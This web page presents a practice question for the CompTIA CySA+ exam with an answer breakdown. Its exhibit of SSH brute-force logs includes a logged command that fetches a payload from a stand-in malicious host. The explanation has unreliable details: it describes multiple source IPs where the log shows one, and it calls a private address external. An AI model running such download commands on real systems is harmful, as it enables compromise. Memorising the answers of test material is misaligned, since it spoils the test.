hardMultiple Choice
CS0-003 Practice Question: An analyst views the above SIEM logs from a Linux…
Exhibit
Refer to the exhibit. Exhibit: ``` [2024-08-15 14:23:45] Failed login for user 'admin' from IP 10.0.0.5: SSH [2024-08-15 14:23:47] Failed login for user 'admin' from IP 10.0.0.5: SSH [2024-08-15 14:23:49] Failed login for user 'admin' from IP 10.0.0.5: SSH [2024-08-15 14:23:51] Successful login for user 'admin' from IP 10.0.0.5: SSH [2024-08-15 14:24:00] Command executed: wget http://malicious.example.com/payload.sh ```
An analyst views the above SIEM logs from a Linux server. Which of the following attacks is MOST likely occurring?
⚠ Common exam trap
CompTIA often tests the distinction between a brute force attack and a denial of service attack by including a successful login event, which eliminates DoS as the answer since DoS does not involve credential compromise or post-exploitation activity.
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
Brute force attack leading to credential compromise and malware installation
The SIEM logs show repeated failed SSH login attempts from multiple IP addresses, followed by a successful login and then a wget command to download a suspicious file, indicating a brute force attack that succeeded, leading to credential compromise and subsequent malware installation. This pattern matches the typical lifecycle of a brute force attack against SSH services, where an attacker gains access and then stages malware.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✗
Man-in-the-middle attack intercepting credentials
Why it's wrong here
A man-in-the-middle (MitM) attack involves an attacker positioning themselves between the client and server to intercept traffic, which typically leaves no trace of repeated authentication failures in the server's local authentication logs. The presence of multiple sequential failed login attempts from a single external IP followed by a successful login directly contradicts a passive or active interception scenario, where the attacker would have acquired the correct credentials beforehand and logged in successfully on the first attempt.
- ✗
SQL injection through the web application
Why it's wrong here
SQL injection (SQLi) attacks target database-driven web applications by injecting malicious SQL statements into input fields, which would generate specific HTTP server logs or database error logs. The provided SIEM logs show SSH authentication events and subsequent shell commands rather than web server access logs containing SQL syntax or database query anomalies.
- ✓
Brute force attack leading to credential compromise and malware installation
Why this is correct
The SIEM logs clearly depict a classic brute-force progression, starting with a rapid succession of failed SSH login attempts from an external IP address. Once a password is successfully guessed, the attacker establishes a session and immediately executes commands to download and run an external payload, confirming both compromise and malware installation.
- ✗
Denial of service attack against the SSH service
Why it's wrong here
A denial of service (DoS) attack against SSH would involve an overwhelming volume of connections designed to exhaust system resources, crash the daemon, or saturate network bandwidth, resulting in service unavailability. In contrast, these logs show a low-volume, targeted sequence of authentication attempts aimed at gaining unauthorized access, followed by successful interactive commands rather than resource exhaustion.
Go deeper
Related to this question
Learn chapter
Malware IOCs: Hashes, IPs, Domains, URLs
Key term
Brute force attack
A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN).
Key term
Malware
Malware is any software intentionally designed to cause damage, disrupt operations, steal data, or gain unauthorized access to computer systems.
About these practice questions
One of 701 original CS0-004 practice questions on Courseiva, each with a full explanation and wrong-answer analysis — not exam dumps or protected exam content. Learn why practice questions differ from exam dumps →
JA
Written by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
This CS0-004 practice question is part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the CS0-004 exam.